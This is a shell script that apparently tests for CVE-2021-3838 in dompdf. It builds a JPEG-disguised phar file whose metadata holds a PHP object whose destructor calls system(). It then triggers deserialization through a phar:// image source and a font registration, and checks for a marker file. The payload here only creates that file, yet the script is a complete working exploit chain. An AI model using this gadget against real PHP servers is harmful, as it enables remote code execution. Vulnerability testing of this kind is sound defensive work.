#!/bin/sh

set -e



tee phar-poc.php <<'EOF'
<?php

class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}
EOF

php --define phar.readonly=0 <<'EOF'
<?php

class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('touch POC');
$phar->setMetadata($object);
$phar->stopBuffering();
EOF

test -f POC && rm -f POC

tee vuln.php <<'EOF'
<?php
error_reporting(E_ALL);
// Include autoloader
include_once( 'dompdf/dompdf_config.inc.php' );
$dompdf = new DOMPDF();

// Include vulnerable objects
include("phar-poc.php");

$dompdf->set_option('enable_remote', true);

// Load HTML content 
$dompdf->load_html('<img src="phar://test.phar">'); 

 
// Render the HTML as PDF 
$dompdf->render(); 
 
// Output the generated PDF to Browser 
//$dompdf->stream(); 

?>
EOF
php vuln.php

ls POC* || echo 'POC not found'

tee vuln2.php <<'EOF'
error_reporting(E_ALL);
// Include autoloader
include_once( 'dompdf/dompdf_config.inc.php' );
include("phar-poc.php");

Font_Metrics::init();

$style_arr = array(
        "family" => "courrier",
        "weight" => "bold",
        "style"  => "italic",
      );
      
Font_Metrics::register_font($style_arr,"phar://test.phar")
EOF
php vuln2.php

ls POC* || echo 'POC not found'

test -f POC && echo 'POC Run CVE-2021-3838 present' && exit 1



exit 0

